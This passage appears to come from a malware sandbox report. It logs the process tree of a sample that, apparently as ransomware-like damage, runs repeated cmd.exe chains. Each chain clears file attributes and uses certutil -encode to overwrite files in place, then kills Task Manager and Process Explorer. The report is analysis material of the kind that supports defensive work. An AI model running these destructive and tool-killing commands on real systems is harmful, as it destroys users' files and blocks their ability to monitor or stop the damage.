      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "branding.xml" "branding.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1756
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Views/modifies file attributes
        
        PID:1816
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "branding.xml" "branding.xml".14849
        5⤵
        
        PID:324
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:964
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1880
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Admin" "Admin".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1812
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "7-Zip" "7-Zip".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1732
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "AddSync.xlsm" "AddSync.xlsm".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1336
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops desktop.ini file(s)
        
        PID:1560
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "AddSync.xlsm" "AddSync.xlsm".14849
        5⤵
        
        PID:660
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1388
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1888
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "CloseUninstall.mov" "CloseUninstall.mov".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:764
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops desktop.ini file(s)
        Drops file in Program Files directory
        
        PID:1596
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "CloseUninstall.mov" "CloseUninstall.mov".14849
        5⤵
        
        PID:1572
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:680
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1736
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Common Files" "Common Files".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1464
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "desktop.ini" "desktop.ini".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1296
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops desktop.ini file(s)
        
        PID:1252
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "desktop.ini" "desktop.ini".14849
        5⤵
        
        PID:1684
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1452
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:852
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "DVD Maker" "DVD Maker".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1420
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ExitRestart.vdx" "ExitRestart.vdx".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1164
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops desktop.ini file(s)
        
        PID:1792
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "ExitRestart.vdx" "ExitRestart.vdx".14849
        5⤵
        
        PID:656
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:900
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1628
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Google" "Google".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:648
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "GrantDebug.xla" "GrantDebug.xla".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:520
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops desktop.ini file(s)
        
        PID:1488
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "GrantDebug.xla" "GrantDebug.xla".14849
        5⤵
        
        PID:1016
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1652
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1900
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Internet Explorer" "Internet Explorer".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1764
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Java" "Java".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1592
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Microsoft Games" "Microsoft Games".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1436
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Microsoft Office" "Microsoft Office".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:816
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Mozilla Firefox" "Mozilla Firefox".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1816
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "MSBuild" "MSBuild".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1944
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ReceiveUninstall.pptx" "ReceiveUninstall.pptx".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1892
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops desktop.ini file(s)
        
        PID:1820
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "ReceiveUninstall.pptx" "ReceiveUninstall.pptx".14849
        5⤵
        
        PID:1840
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:436
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1752
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Reference Assemblies" "Reference Assemblies".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1560
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "SaveReset.vsdm" "SaveReset.vsdm".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1640
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops desktop.ini file(s)
        
        PID:760
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "SaveReset.vsdm" "SaveReset.vsdm".14849
        5⤵
        
        PID:1664
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1568
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1848
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "SelectCompress.vstx" "SelectCompress.vstx".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1428
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops desktop.ini file(s)
        
        PID:912
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "SelectCompress.vstx" "SelectCompress.vstx".14849
        5⤵
        
        PID:1480
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1068
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1712
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "StartShow.vsw" "StartShow.vsw".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1252
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops desktop.ini file(s)
        
        PID:1512
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "StartShow.vsw" "StartShow.vsw".14849
        5⤵
        
        PID:1908
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1564
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1940
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "TestRevoke.mp2v" "TestRevoke.mp2v".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1420
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops desktop.ini file(s)
        Views/modifies file attributes
        
        PID:1792
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "TestRevoke.mp2v" "TestRevoke.mp2v".14849
        5⤵
        
        PID:1516
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:2036
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1352
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Uninstall Information" "Uninstall Information".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1164
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "UninstallRepair.eps" "UninstallRepair.eps".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:648
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops desktop.ini file(s)
        
        PID:1488
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "UninstallRepair.eps" "UninstallRepair.eps".14849
        5⤵
        
        PID:1748
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:636
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:592
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "UnprotectShow.nfo" "UnprotectShow.nfo".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:520
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops desktop.ini file(s)
        
        PID:1764
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "UnprotectShow.nfo" "UnprotectShow.nfo".14849
        5⤵
        
        PID:1592
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1928
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1820
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "UnpublishConvertTo.ico" "UnpublishConvertTo.ico".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1840
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops desktop.ini file(s)
        
        PID:1812
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "UnpublishConvertTo.ico" "UnpublishConvertTo.ico".14849
        5⤵
        
        PID:1880
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:436
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1560
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "VideoLAN" "VideoLAN".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1680
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows Defender" "Windows Defender".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1664
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows Journal" "Windows Journal".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1336
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows Mail" "Windows Mail".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1440
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows Media Player" "Windows Media Player".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1388
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows NT" "Windows NT".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1596
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows Photo Viewer" "Windows Photo Viewer".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1848
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows Portable Devices" "Windows Portable Devices".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1640
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows Sidebar" "Windows Sidebar".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:912
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7-zip.chm" "7-zip.chm".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1456
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1736
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "7-zip.chm" "7-zip.chm".14849
        5⤵
        
        PID:764
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:680
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1684
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7-zip.dll" "7-zip.dll".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1672
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:852
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "7-zip.dll" "7-zip.dll".14849
        5⤵
        
        PID:944
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:556
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1088
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7-zip32.dll" "7-zip32.dll".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:656
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1248
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "7-zip32.dll" "7-zip32.dll".14849
        5⤵
        
        PID:900
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1920
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1092
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7z.dll" "7z.dll".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1488
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1016
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "7z.dll" "7z.dll".14849
        5⤵
        
        PID:1832
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        
        PID:828
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1688
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7z.exe" "7z.exe".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1764
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1656
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "7z.exe" "7z.exe".14849
        5⤵
        
        PID:1988
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        
        PID:1152
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1660
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7z.sfx" "7z.sfx".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1812
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1364
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "7z.sfx" "7z.sfx".14849
        5⤵
        
        PID:1624
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1732
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:316
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7zCon.sfx" "7zCon.sfx".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1680
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1664
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "7zCon.sfx" "7zCon.sfx".14849
        5⤵
        
        PID:1336
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1568
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1640
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7zFM.exe" "7zFM.exe".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1520
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1692
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "7zFM.exe" "7zFM.exe".14849
        5⤵
        
        PID:764
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1572
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1684
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7zG.exe" "7zG.exe".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1696
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1452
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "7zG.exe" "7zG.exe".14849
        5⤵
        
        PID:944
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1884
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1088
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "descript.ion" "descript.ion".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:328
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:692
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "descript.ion" "descript.ion".14849
        5⤵
        
        PID:900
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:672
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1092
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "History.txt" "History.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1748
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1932
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "History.txt" "History.txt".14849
        5⤵
        
        PID:1832
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1900
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1688
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Lang" "Lang".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1592
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "License.txt" "License.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1944
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1988
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "License.txt" "License.txt".14849
        5⤵
        
        PID:964
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1928
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1764
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "readme.txt" "readme.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1892
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1624
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "readme.txt" "readme.txt".14849
        5⤵
        
        PID:1964
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:760
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1812
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Uninstall.exe" "Uninstall.exe".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1440
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:1336
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Uninstall.exe" "Uninstall.exe".14849
        5⤵
        
        PID:660
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1596
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1680
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "af.txt" "af.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1712
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:764
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "af.txt" "af.txt".14849
        5⤵
        
        PID:1468
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        
        PID:1068
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1520
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "an.txt" "an.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1252
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:944
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "an.txt" "an.txt".14849
        5⤵
        
        PID:1792
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1564
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
